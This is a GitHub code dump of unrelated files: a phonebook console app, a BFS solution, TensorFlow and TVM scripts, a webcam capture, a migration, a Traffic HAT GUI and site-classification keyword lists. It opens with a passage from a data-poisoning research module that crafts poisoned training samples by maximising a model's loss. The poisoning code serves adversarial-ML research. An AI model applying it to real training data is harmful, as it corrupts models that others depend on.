\"\"\"Brew passenger poison with given arguments.\n\n    “Double, double toil and trouble;\n    Fire burn, and cauldron bubble....\n\n    Round about the cauldron go;\n    In the poison'd entrails throw.”\n\n    \"\"\"\n\n    def _define_objective(self, inputs, labels):\n        \"\"\"Implement the closure here.\"\"\"\n        def closure(model, criterion, optimizer, causal_model, causal_criterion):\n            \"\"\"This function will be evaluated on all GPUs.\"\"\" # noqa: D401\n            if not self.args.only_causal:\n                outputs = model(inputs)\n                loss = -criterion(outputs,labels)\n            else:\n                loss = 0\n\n            # add causal_loss\n            
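# NOTE (editor): this closure assumes causal_beta != 0 whenever only_causal is\n            # set; otherwise `loss` stays a plain int (which has no .backward()) and\n            # `outputs`, used to compute `prediction` below, is never defined.\n            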
if self.args.causal_beta != 0:\n causal_loss = causal_criterion.run(causal_model, inputs, labels)\n loss += causal_loss\n\n loss.backward(retain_graph=self.retain)\n prediction = (outputs.data.argmax(dim=1) == labels).sum()\n return loss.detach().cpu(), prediction.detach().cpu()\n return closure\n","repo_name":"Thinklab-SJTU/DICE","sub_path":"poison/village/shop/forgemaster_untargeted_w_causal.py","file_name":"forgemaster_untargeted_w_causal.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"18228665268","text":"# Здесь можно создать различные интерфейсы\n# По ТЗ сделан только консольный интерфейс\n\nimport os\nfrom typing import List, Callable\nfrom abc import ABC, abstractmethod\n\n\n\n\nfrom rich.console import Console\nfrom rich.table import Table\nfrom rich.prompt import Prompt, Confirm\nfrom rich.text import Text\n\n\nfrom .db.strategies import DataBaseStrategy\nfrom .services import ContactsService\nfrom .schemas import Contact\n\n\n\nclass ContactsAbstractInterface(ABC):\n pass\n\n\nclass Status:\n def __init__(self) -> None:\n self.style = \"\"\n self.text = \"\"\n\n def update(self, text:str, danger:bool = False) -> None:\n self.text = \"Status: \"+text\n if danger:\n self.style = \"red\"\n else:\n self.style = \"green\"\n\n def reset(self) -> None:\n self.text = \"\"\n self.style = \"\"\n\nclass ContactsConsoleInterface(ContactsAbstractInterface):\n def __init__(self, contacts_per_page: int = None) -> None:\n \"\"\"\n @param\n contacts_per_page - If not defined, it is calculated automatically.\n \"\"\"\n self.service = ContactsService()\n self.on_startup()\n self.console = Console(force_interactive=True)\n\n self.console.print(\"PhoneBook | Your guide to the world of contacts\")\n\n\n # buttons\n\n self.buttons = {\n 'prev': {\n 'sym':'p', \n 'text':'Prev page'\n },\n 'next': {\n 'sym':'n', \n 'text':'Next page'\n },\n 'add_contact': {\n 'sym':'a',\n 'text':'Add contact'\n },\n 'find_contact': {\n 'sym':'f',\n 'text':'Find contact'\n },\n 'exit': {\n 'sym':'x',\n 'text':'Exit (or Ctrl+C)'\n },\n 'search_panel': {\n 'sym':'s',\n 'text':'Exit search panel'\n }\n }\n\n self.prev_button = self.get_stylized_menu_button(button=self.buttons['prev'])\n self.prev_button__inactive = self.get_stylized_menu_button(button=self.buttons['prev'], inactive=True)\n \n self.next_button = self.get_stylized_menu_button(button=self.buttons['next'])\n self.next_button__inactive = self.get_stylized_menu_button(button=self.buttons['next'], inactive=True)\n\n self.add_contact_button = self.get_stylized_menu_button(button=self.buttons['add_contact'])\n\n self.search_panel_disable_button = self.get_stylized_menu_button(button=self.buttons['search_panel'])\n\n self.find_contact_button = self.get_stylized_menu_button(button=self.buttons['find_contact'])\n self.find_contact_button__inactive = self.get_stylized_menu_button(button=self.buttons['find_contact'], inactive=True)\n\n self.exit_button = self.get_stylized_menu_button(button=self.buttons['exit'], danger=True)\n\n\n # vars\n\n self.page:List[Contact] = []\n self.page_num = 1\n self.next = False\n self.prev = False\n \n self.search_panel_enabled = False\n self.search_panel_page:List[Contact] = []\n self.search_panel_contacts:List[Contact] = []\n self.search_panel_next = False\n self.search_panel_prev = False\n self.search_panel_page_num = 1\n\n self.not_work = False\n self.status = Status()\n self.empty_contacts = self.are_the_contacts_empty()\n\n # 
adaptive\n \n self.columns, self.lines = self.get_terminal_size()\n if contacts_per_page is None:\n self.service.NUM_OF_CONTACTS_PER_PAGE = self.calc_num_contacts_per_page()\n self.contacts_per_page_calc_auto = True\n else:\n self.service.NUM_OF_CONTACTS_PER_PAGE = contacts_per_page\n self.contacts_per_page_calc_auto = False\n\n if self.columns <= 84 or self.lines <= 10:\n self.console.print(f\"Error! With this resolution of the console, the program cannot run. Set console size. We highly recommend ({84}<,{30}<)\", style='red')\n self.not_work = True\n\n\n\n\n # Events\n\n def loop(self) -> None:\n loop = True\n while loop and not self.not_work:\n try:\n ch = self.main_menu()\n\n if ch in [self.buttons['exit']['sym'],self.buttons['exit']['sym'].upper()]:\n loop = False\n\n elif ch in [self.buttons['add_contact']['sym'],self.buttons['add_contact']['sym'].upper()]:\n self.add_contact_menu()\n\n elif ch in [self.buttons['find_contact']['sym'],self.buttons['find_contact']['sym'].upper()] and not self.empty_contacts:\n self.find_contact_menu()\n\n elif ch in [self.buttons['prev']['sym'],self.buttons['prev']['sym'].upper()]:\n if self.search_panel_enabled:\n if self.search_panel_prev:\n self.search_panel_page_num -= 1\n else:\n if self.prev:\n self.page_num -= 1\n\n elif ch in [self.buttons['next']['sym'],self.buttons['next']['sym'].upper()]:\n if self.search_panel_enabled:\n if self.search_panel_next:\n self.search_panel_page_num += 1\n else:\n if self.next:\n self.page_num += 1\n\n elif ch in [self.buttons['search_panel']['sym'],self.buttons['search_panel']['sym'].upper()]:\n self.search_panel_enabled = False\n self.search_pane_page_num = 1\n self.search_panel_page = []\n self.search_panel_contacts = []\n\n elif 'del' in ch and not self.empty_contacts:\n ch = ch.replace('del', '')\n try:\n ch = int(ch)\n except ValueError:\n continue\n if ch in [int(i) for i in range(1, len(self.page)+1)]:\n self.delete_contact_menu(ch)\n\n elif ch in [str(i) for i in range(1, len(self.page)+1)] and not self.empty_contacts:\n try:\n ch = int(ch)\n except ValueError:\n continue\n self.edit_contact_menu(ch)\n except KeyboardInterrupt:\n loop = False\n self.on_shutdown()\n\n def on_startup(self):\n self.service.on_startup()\n def on_shutdown(self):\n self.service.on_shutdown()\n\n\n \n # Menu\n\n def main_menu(self) -> str:\n self.clear_screen()\n # page:List[Contact] = []\n if self.search_panel_enabled:\n page, prev, next = self.service.pagination(self.search_panel_page_num, self.search_panel_contacts)\n self.search_panel_page = page\n self.search_panel_next = next\n self.search_panel_prev = prev\n else:\n page, prev, next = self.service.pagination(self.page_num)\n self.page = page\n self.next = next\n self.prev = prev\n self.print_page(page)\n\n divider = self.service.NUM_OF_CONTACTS_PER_PAGE - len(page) \n for i in range(divider * 2):\n self.console.print()\n \n if not self.empty_contacts:\n self.console.print(f\"Enter a contact number to [cyan]edit[/cyan] it (1-{len(page)}), when adding [red]'del'[/red] keyword removes it\", markup=True)\n if self.search_panel_enabled:\n self.console.print(f\"Or enter the symbol of the search panel menu item {self.search_panel_page_num}\")\n else:\n self.console.print(\"Or enter the symbol of the menu item\")\n else:\n self.console.print(\"Oops, no contacts yet :(\")\n self.console.print(\"Create your first contact by entering the keyword [green]'a'[/green]\", markup=True)\n self.console.print(self.status.text, style=self.status.style)\n self.status.reset()\n\n # menu\n\n if 
prev:\n self.console.print(self.prev_button)\n else:\n self.console.print(self.prev_button__inactive)\n\n if next:\n self.console.print(self.next_button)\n else:\n self.console.print(self.next_button__inactive)\n\n if not self.empty_contacts:\n self.console.print(self.find_contact_button)\n else:\n self.console.print(self.find_contact_button__inactive)\n\n if self.search_panel_enabled:\n self.console.print(self.search_panel_disable_button)\n else:\n self.console.print(self.add_contact_button)\n\n self.console.print(self.exit_button)\n\n return input(\" : \")\n \n def add_contact_menu(self, contact: Contact = None) -> None:\n self.clear_screen()\n self.console.print(\"# Add contact menu\")\n confirm = Confirm.ask(\"Are you sure you want to create a contact?\", default='y')\n if not confirm:\n return None\n if contact is not None:\n first_name = Prompt.ask(\"Enter first name\", default=contact.first_name)\n middle_name = Prompt.ask(\"Enter middle name\", default=contact.middle_name)\n last_name = Prompt.ask(\"Enter last name\", default=contact.last_name)\n company = Prompt.ask(\"Enter company name\", default=contact.company)\n work_phone = Prompt.ask(\"Enter work phone\", default=contact.work_phone)\n personal_phone = Prompt.ask(\"Enter personal phone\", default=contact.personal_phone)\n else:\n first_name = Prompt.ask(\"Enter first name\")\n middle_name = Prompt.ask(\"Enter middle name\")\n last_name = Prompt.ask(\"Enter last name\")\n company = Prompt.ask(\"Enter company name\")\n work_phone = Prompt.ask(\"Enter work phone\")\n personal_phone = Prompt.ask(\"Enter personal phone\")\n contact = Contact(\n first_name=first_name,\n middle_name=middle_name,\n last_name=last_name,\n company=company,\n work_phone=work_phone,\n personal_phone=personal_phone\n )\n self.console.print(contact)\n confirm = Confirm.ask(\"All OK? 
Save?\")\n if not confirm:\n contact = self.add_contact_menu(contact)\n return None\n if contact is not None:\n self.service.add(contact)\n self.empty_contacts = self.are_the_contacts_empty()\n self.status.update(\"Contact added!\")\n if self.contacts_per_page_calc_auto:\n self.service.NUM_OF_CONTACTS_PER_PAGE = self.calc_num_contacts_per_page()\n else:\n self.status.update(\"Contact not added!\", danger=True)\n\n def edit_contact_menu(self, ch:int) -> None:\n self.clear_screen()\n if self.search_panel_enabled:\n contact = self.search_panel_page[ch-1]\n else:\n contact = self.page[ch-1]\n\n confirm = Confirm.ask(\"Are you sure you want to edit this contact?\", default='y')\n if not confirm:\n self.status.update(\"Contact not edited!\", danger=True)\n return None\n \n first_name = Prompt.ask(\"Enter first name\", default=contact.first_name)\n middle_name = Prompt.ask(\"Enter middle name\", default=contact.middle_name)\n last_name = Prompt.ask(\"Enter last name\", default=contact.last_name)\n company = Prompt.ask(\"Enter company name\", default=contact.company)\n work_phone = Prompt.ask(\"Enter work phone\", default=contact.work_phone)\n personal_phone = Prompt.ask(\"Enter personal phone\", default=contact.personal_phone)\n\n contact.first_name=first_name\n contact.middle_name=middle_name\n contact.last_name=last_name\n contact.company=company\n contact.work_phone=work_phone\n contact.personal_phone=personal_phone\n\n self.status.update(\"Contact edited!\")\n\n def delete_contact_menu(self, nums : int | List[int]) -> None:\n self.clear_screen()\n if isinstance(nums, int):\n if self.search_panel_enabled:\n contact = self.search_panel_page[nums-1]\n else:\n contact = self.page[nums-1]\n self.console.print(contact)\n confirm = Confirm.ask(f\"Are you sure you want to delete this contact?\")\n if confirm:\n self.service.delete(contact)\n self.status.update(\"Contact deleted!\", danger=True)\n self.empty_contacts = self.are_the_contacts_empty()\n if self.contacts_per_page_calc_auto:\n self.service.NUM_OF_CONTACTS_PER_PAGE = self.calc_num_contacts_per_page()\n else:\n # TODO Сделать в будущем функцию для удаления множества контактов одной командой (Перечисление их номеров)\n confirm = Confirm.ask(\"Are you sure you to delete this contacts?\")\n\n\n def find_contact_menu(self):\n self.clear_screen()\n query = Prompt.ask(\"Enter name, company or phone number\")\n contacts = self.service.find(query)\n self.console.print(contacts)\n if contacts:\n self.search_panel_contacts = contacts\n self.search_panel_enabled = True\n self.status.update(\"Here is what you found for your query!\")\n else:\n self.status.update(\"Nothing found for your query!\", danger=True)\n\n\n # Utils\n def are_the_contacts_empty(self):\n if len(self.service.get_all()) == 0:\n self.search_panel_enabled = False\n return True\n return False\n\n def clear_screen(self):\n os.system('cls')\n\n def get_terminal_size(self) -> tuple[int,int]:\n return os.get_terminal_size()\n\n def calc_num_contacts_per_page(self) -> int:\n lines = self.lines - 11 # Строки занимающие грани таблицы и пункты меню\n return min(lines // 2, len(self.service.get_all()))\n\n def get_stylized_menu_button(self, button: dict, inactive: bool = False, danger: bool = False) -> Text:\n stylized_button = Text()\n if inactive:\n sym_style = \"bold #222222\"\n text_style = \"#222222\"\n else:\n sym_style = \"bold blue\"\n text_style = \"\"\n if danger:\n sym_style = \"bold red\"\n text_style = \"red\"\n stylized_button.append('|'+button['sym']+'|', style=sym_style)\n 
stylized_button.append(' '+button['text'], style=text_style)\n        return stylized_button\n\n    def print_page(self, contacts_list:List[Contact]) -> None:\n        table = Table(show_lines=True, expand=True)\n        table.add_column(\"№\", style=\"green\", no_wrap=True, min_width=1)\n        table.add_column(\"First name\", style=\"cyan\", no_wrap=True, max_width=12)\n        table.add_column(\"Middle name\", style=\"green\", no_wrap=True, max_width=12)\n        table.add_column(\"Last name\", style=\"cyan\", no_wrap=True, max_width=12)\n        table.add_column(\"Company\", style=\"green\", no_wrap=True, max_width=12)\n        table.add_column(\"Work phone\", style=\"cyan\", no_wrap=True, max_width=12)\n        table.add_column(\"Personal phone\", style=\"green\", no_wrap=True, max_width=12)\n\n        for n, i in enumerate(contacts_list):\n            table.add_row(str(n+1), i.first_name, i.middle_name, i.last_name, i.company, i.work_phone, i.personal_phone)\n\n        self.console.print(table)\n","repo_name":"sumrak10/PhoneBook","sub_path":"PhoneBook/interfaces.py","file_name":"interfaces.py","file_ext":"py","file_size_in_byte":15697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1057948731","text":"from collections import deque\n\n# Programmers 'word transformation' problem: BFS over words that differ by\n# exactly one character; returns the minimum number of conversions, or 0 if\n# the target is unreachable.\ndef solution(begin, target, words):\n    if target not in words:\n        return 0\n\n    def adjacent(a, b):\n        # words are the same length; adjacent means exactly one differing position\n        return sum(x != y for x, y in zip(a, b)) == 1\n\n    visited = set()\n    queue = deque([(begin, 0)])\n    while queue:\n        word, depth = queue.popleft()\n        if word == target:\n            return depth\n        for candidate in words:\n            if candidate not in visited and adjacent(word, candidate):\n                visited.add(candidate)\n                queue.append((candidate, depth + 1))\n    return 0\n\nprint(solution(\"hit\", \"cog\", [\"hot\", \"dot\", \"dog\", \"lot\", \"log\", \"cog\"]))  # expected: 4\n","repo_name":"hydenny/coding-test-practice","sub_path":"프로그래머스/Untitled-1.py","file_name":"Untitled-1.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28347495767","text":"import os\nfrom PIL import Image\nfrom glob import glob\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\n\n\ndef load_dataset(data_path, batch_size, scale_size, split=None, is_grayscale=False, seed=None):\n    dataset_name = os.path.basename(data_path)\n    if dataset_name in ['CelebA'] and split:\n        data_path = os.path.join(data_path, 'splits', split)\n    elif dataset_name in ['RenderBall', 'RenderBallTri']:\n        data_path = data_path\n    else:\n        is_grayscale = True\n        raise Exception('[!] Caution! 
Unknown dataset name.')\n\n paths = []\n tf_decode = tf.image.decode_jpeg\n for ext in [\"jpg\", \"png\"]:\n paths = glob(\"{}/*.{}\".format(data_path, ext))\n\n if ext == 'png':\n tf_decode = tf.image.decode_png\n\n if len(paths) != 0:\n break\n\n with Image.open(paths[0]) as img:\n w, h = img.size\n shape = [h, w, 3]\n\n filename_queue = tf.train.string_input_producer(list(paths), shuffle=False, seed=seed)\n reader = tf.WholeFileReader()\n filename, data = reader.read(filename_queue)\n image = tf_decode(data, channels=3)\n\n if is_grayscale:\n image = tf.image.rgb_to_grayscale(image)\n shape = [h, w, 1]\n image.set_shape(shape)\n\n min_after_dequeue = 5000\n capacity = min_after_dequeue + 3 * batch_size\n\n queue = tf.train.shuffle_batch(\n [image], batch_size=batch_size,\n num_threads=4, capacity=capacity,\n min_after_dequeue=min_after_dequeue, name='synthetic_inputs')\n\n if dataset_name in ['CelebA']:\n queue = tf.image.crop_to_bounding_box(queue, 50, 25, 128, 128)\n queue = tf.image.resize_nearest_neighbor(queue, [scale_size, scale_size])\n else:\n queue = tf.image.resize_nearest_neighbor(queue, [scale_size, scale_size])\n\n return tf.to_float(queue)\n\n\ndef load_mnist(data_path):\n mnist_data = read_data_sets(data_path, one_hot=True)\n\n return mnist_data\n\n\ndef generate_gmm_circle_data(num_data=50000, dim=2, num_cluster=8, scale=4, var=0.02):\n means_x = np.array([scale * np.cos(i * 2 * np.pi / num_cluster) for i in range(num_cluster)])\n means_y = np.array([scale * np.sin(i * 2 * np.pi / num_cluster) for i in range(num_cluster)])\n means = np.vstack((means_x, means_y)).transpose()\n # print means\n std = np.array([var] * num_cluster).transpose()\n weights = np.array([1. / num_cluster] * num_cluster).transpose()\n if num_cluster == 2:\n weights = np.array([2./3, 1./3])\n\n data = np.zeros([num_data, 2], dtype=np.float32)\n clusters = np.zeros([num_data, ], dtype=np.float32)\n for i in range(data.shape[0]):\n cluster = np.random.choice(range(num_cluster), p=weights)\n sample = np.random.multivariate_normal(mean=means[cluster].flatten(),\n cov=np.identity(2) * std[cluster])\n data[i] = sample.transpose()\n clusters[i] = cluster\n\n data = np.clip(data, -3 * scale, 3 * scale)\n\n return data, means\n\n\ndef batch_gmm_gen(data, batch_size):\n while True:\n np.random.shuffle(data)\n for i in range(0, len(data) - batch_size + 1, batch_size):\n yield data[i:i + batch_size]\n\n","repo_name":"weilinie/Understand-GAN","sub_path":"img_helpers.py","file_name":"img_helpers.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29854565572","text":"import cv2\n\npath = \"./image/pic_test.jpg\"\n\ndef take_pic(): \n cap = cv2.VideoCapture(0)\n ret, frame = cap.read()\n cv2.imshow('frame', frame)\n # key = cv2.waitKey(1)\n cv2.imwrite(path, frame)\n cap.release()\n cv2.destroyAllWindows()\n\n# take_pic()\n","repo_name":"KanNa-max/SmartLock_QR","sub_path":"code/module/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25841260360","text":"######################################################################\n# Utils for downloading and extracting zip files\n# ---------------------------------------------\nimport os\nimport tvm\nfrom tvm import relay\nfrom tvm.relay import transform as _transform\nimport numpy as np\n\ndef extract(path):\n import tarfile\n if 
path.endswith(\"tgz\") or path.endswith(\"gz\"):\n dir_path = os.path.dirname(path)\n tar = tarfile.open(path)\n tar.extractall(path=dir_path)\n tar.close()\n else:\n raise RuntimeError('Could not decompress the file: ' + path)\n\n######################################################################\n# Load pretrained TFLite model\n# ---------------------------------------------\n# we load mobilenet V1 TFLite model provided by Google\nfrom tvm.contrib.download import download_testdata\n\nmodel_url = \"https://storage.googleapis.com/download.tensorflow.org/models/mobilenet_v1_2018_08_02/mobilenet_v1_1.0_224_quant.tgz\"\n\n# we download model tar file and extract, finally get tflite file\nmodel_path = download_testdata(model_url, \"mobilenet_v1_1.0_224_quant.tgz\", module=['tf', 'official'])\nmodel_dir = os.path.dirname(model_path)\nextract(model_path)\n\n# now we have mobilenet_v1_1.0_224_quant.tflite on disk and open it\ntflite_model_file = os.path.join(model_dir, \"mobilenet_v1_1.0_224_quant.tflite\")\ntflite_model_buf = open(tflite_model_file, \"rb\").read()\n\n# get TFLite model from buffer\nfrom tflite.Model import Model # edit here\ntflite_model = Model.GetRootAsModel(tflite_model_buf, 0)\n\n#######################################################################\n# Generic run functions for TVM & TFLite\n# --------------------------------------\ntarget = tvm.target.riscv_cpu(\"spike\")\ninput_tensor = \"input\"\ninput_shape = (1, 224, 224, 3)\ninput_dtype = \"uint8\"\n\n# Parse TFLite model and convert it to a Relay module\nmod, params = relay.frontend.from_tflite(tflite_model,\n shape_dict={input_tensor: input_shape},\n dtype_dict={input_tensor: input_dtype})\n\n\"\"\" tensorize flow\n call FTVMQnnLegalize() & FTVMQnnCanonicalize for QNN utilty\n call ConvertLayout() to convert conv2d layout from NHWC to NCHW\n call Legalize() to adding pad to conv2d for match the axis (Input channel : as mutiple of 4 / Output channel : as multiple of 16 )\n call AlterOpLaout() to convert conv2d into conv2d_int8\n\"\"\"\nprint('qnn_mod before : ', mod)\nseq = tvm.transform.Sequential([\n relay.transform.Legalize('FTVMQnnLegalize'),\n relay.transform.Legalize('FTVMQnnCanonicalize'),\n relay.transform.ConvertLayout({'nn.conv2d': ['NCHW', 'OIHW']}),\n relay.transform.Legalize(),\n relay.transform.AlterOpLayout(),\n])\nwith tvm.transform.PassContext(opt_level=3):\n with tvm.target.create(target):\n mod = seq(mod)\nprint('qnn_mod after : ', mod)\n# --------------------------------------------------------------\n\n# opt pass\nfrom tvm.relay.quantize.quantize import _bind_params\noptimize = tvm.transform.Sequential([relay.transform.SimplifyInference(),\n relay.transform.FoldConstant(),\n relay.transform.FoldScaleAxis(),\n relay.transform.CanonicalizeOps(),\n relay.transform.FoldConstant()])\nmod['main'] = _bind_params(mod['main'], params)\nwith tvm.transform.PassContext(opt_level=3):\n mod = optimize(mod)\nprint('opt mod : ', mod)\n\n# --------------------------------------------------------------\n\n\nwith relay.build_config(opt_level=0):\n module = relay.build(mod, target, params=params)\n\nlib, graph, params = module.get_lib(), module.get_json(), module.get_params()\n\ntarget_dir, model_name = '.', 'mobilenet'\n\nwith open(target_dir + '/' + model_name + '.ll', 'w') as _f:\n _f.write(lib.get_source())\nwith open(target_dir + '/' + model_name + '.graph', 'w') as _f:\n _f.write(graph)\nwith open(target_dir + '/' + model_name + '.params', 'wb') as _f:\n _f.write(relay.save_param_dict(params))\nprint(\"save 
finish\")\n","repo_name":"nthu-pllab/RISCV-DLR","sub_path":"example/pre_quant_mobilenet_v1_tflite/build_module.py","file_name":"build_module.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"73969890729","text":"from guizero import *\nfrom gpiozero import TrafficHat\nfrom threading import Thread\n\nth = TrafficHat(pwm=True)\n\napp = App(\"Traffic HAT controller\", layout=\"grid\")\n\ndef scaled(v):\n    return v / 100\n\ndef update_lights():\n    while True:\n        yield (scaled(red.value), scaled(amber.value), scaled(green.value))\n\ndef update_button():\n    while True:\n        button_pressed.value = th.button.value\n        button_held.value = th.button.is_held\n\nText(app, \"Lights\", grid=[0, 1])\nText(app, \"Red\", grid=[1, 0])\nred = Slider(app, start=100, end=0, grid=[1, 1], horizontal=False)\nText(app, \"Amber\", grid=[2, 0])\namber = Slider(app, start=100, end=0, grid=[2, 1], horizontal=False)\nText(app, \"Green\", grid=[3, 0])\ngreen = Slider(app, start=100, end=0, grid=[3, 1], horizontal=False)\n\nText(app, \"Buzzer\", grid=[0, 2])\nPushButton(app, command=th.buzzer.on, text=\"on\", grid=[1, 2])\nPushButton(app, command=th.buzzer.off, text=\"off\", grid=[2, 2])\nPushButton(app, command=th.buzzer.beep, text=\"beep\", grid=[3, 2])\n\nText(app, \"Button\", grid=[0, 3])\nbutton_pressed = CheckBox(app, \"Pushed\", grid=[1, 3])\nbutton_held = CheckBox(app, \"Held\", grid=[2, 3])\n\nth.lights.source = update_lights()\n\nthread = Thread(target=update_button)\nthread.start()\n\napp.display()\n","repo_name":"bennuttall/guizero-examples","sub_path":"traffic-hat/traffic_hat.py","file_name":"traffic_hat.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"72430554089","text":"import urllib.request\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\ndef getApi(address):\n    try:\n        response = urllib.request.urlopen(address).read()\n    except Exception:\n        logging.getLogger().error(\"Unable to load data from \" + address)\n        return None  # avoid an UnboundLocalError when the request fails\n    return response","repo_name":"ivandelic/oci-devops-functions-blue-green","sub_path":"functions/api-retriever/apimanager.py","file_name":"apimanager.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"8082811167","text":"# working with dates\nfrom datetime import date\nfrom datetime import time\nfrom datetime import datetime\n\ndef main():\n    td = date.today()\n    print(\"Today is : \", td)\n\n# print date components\n    print(\"Date components : \",td.day, td.month, td.year)\n\n# receive weekday\n    print(\"Today weekday is \", td.weekday())\n    days=[\"mon\", \"tue\",\"wed\",\"thu\",\"fri\",\"sat\",\"sun\"]\n    print(\"Which is a : \", days[td.weekday()])\n\n# get the current time from the datetime class\n    print(\"the current time is : \", datetime.time(datetime.now()))\n\n\nif(__name__==\"__main__\"):\n    main() ","repo_name":"aliJlidi/Python_basics","sub_path":"dates.py","file_name":"dates.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34864970333","text":"\"\"\"empty message\n\nRevision ID: 3b8a6ed35c7c\nRevises: 7fd63e303772\nCreate Date: 2021-03-15 23:57:16.998560\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by 
Alembic.\nrevision = '3b8a6ed35c7c'\ndown_revision = '7fd63e303772'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('patient', 'previous_help')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('patient', sa.Column('previous_help', mysql.TINYINT(display_width=1), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n","repo_name":"kvaldesvallejo/phobiasBackEnd","sub_path":"migrations/versions/3b8a6ed35c7c_.py","file_name":"3b8a6ed35c7c_.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22297701839","text":"import os\nimport numpy as np\nimport cv2\nfrom tqdm import tqdm\n\n\npic_path = 'ctc_raw_data/train/Fluo-C2DL-MSC/02_RES'\nraw_path = 'ctc_raw_data/train/Fluo-C2DL-Huh7/01'\n\n\n# pic_list = sorted([p for p in os.listdir(pic_path) if p.split('.')[1] == 'tif'])\n# result = cv2.VideoWriter(f'{pic_path.split(\"/\")[-2]}-{pic_path.split(\"/\")[-1]}.mp4',\n# cv2.VideoWriter_fourcc('M', 'P', '4', 'V'), 10, (512, 512), False)\n# for img in tqdm(pic_list):\n# im = cv2.imread(os.path.join(pic_path, img), cv2.IMREAD_UNCHANGED)\n# im8 = im.astype(np.ubyte)\n# result.write(im8)\n#\n# result.release()\n\n\nraw_list = sorted([p for p in os.listdir(raw_path) if p.split('.')[1] == 'tif'])\nraw = cv2.VideoWriter(f'{raw_path.split(\"/\")[-2]}-{raw_path.split(\"/\")[-1]}.avi',\n -1, 10, (512, 512), False)\nfor img in tqdm(raw_list):\n im = cv2.imread(os.path.join(raw_path, img), cv2.IMREAD_UNCHANGED)\n im8 = im.astype(np.ubyte)\n raw.write(im8)\n\nraw.release()\n","repo_name":"nkjcqvcpi/Exp-DVP","sub_path":"Cell_Tracking/EmbedTrack/virtulize.py","file_name":"virtulize.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28447953819","text":"_negs = [\n\n # facebook\n\n '2008/fbml',\n 'like.php',\n 'sharer.php',\n 'likebox.php',\n '/plugins/',\n\n # twitter\n\n '/intent/',\n '?status=',\n 'twitter.com/share',\n 'widgets.js',\n '/widgets/',\n\n # g+\n\n '/share?',\n\n # pinterest\n\n 'pinit.js',\n 'pin/create',\n 'pinmarklet.js',\n\n]\n\n_negs_equals = [\n 'facebook.com',\n 'twitter.com',\n 'facebook.com/',\n 'twitter.com/',\n]\n\nsocial = [\n 'facebook.com',\n 'twitter.com',\n 'plus.google.com',\n 'pinterest.com',\n 'youtube.com',\n]\n\namazon = [\n 'amazon.com.au',\n 'amazon.com.br',\n 'amazon.ca',\n 'amazon.cn',\n 'amazon.fr',\n 'amazon.de',\n 'amazon.in',\n 'amazon.it',\n 'amazon.co.jp',\n 'amazon.com.mx',\n 'amazon.nl',\n 'amazon.es',\n 'amazon.co.uk',\n 'amazon.com/',\n]\n\nadvertising = [\n 'google_ad_client',\n 'doubleclick.net',\n]\n\nanalytics = [\n 'google-analytics.com/ga.js',\n 'googletag', #webmaster\n\n 'connect.facebook.net',\n 'fb:page_id',\n 'fb:app_id',\n 'fb:admins',\n\n 'alexa.com',\n\n 'optimizely.com',\n\n]\n\ncms = [\n\n # Blog\n \n 'wordpress',\n 'drupal',\n 'joomla',\n\n 'expressionengine',\n \n # Wiki\n\n 'mediawiki',\n 'phpwiki',\n 'tiki wiki',\n 'dokuwiki',\n \n # Forum\n\n 'vbulletin',\n 'phpbb',\n 'mybb',\n 'invision',\n 'xenforo',\n\n # Ecommerce\n\n 'magento',\n 'prestashop',\n 'oscommerce',\n \n 'woocommerce',\n 'woothemes',\n\n]\n\ndictionary = [ \n\n # Finance / Law\n\n 'debt',\n 'saving',\n 'mortgage',\n 'insurance',\n 'financ', \n 'pay',\n 'tax',\n 'money',\n 'bank',\n 
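# (editor note, assumption) the entries in these lists appear to be lowercase\n    # substrings matched against domain names to bucket sites by topic; the\n    # ordering within a group does not look significant.\n    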
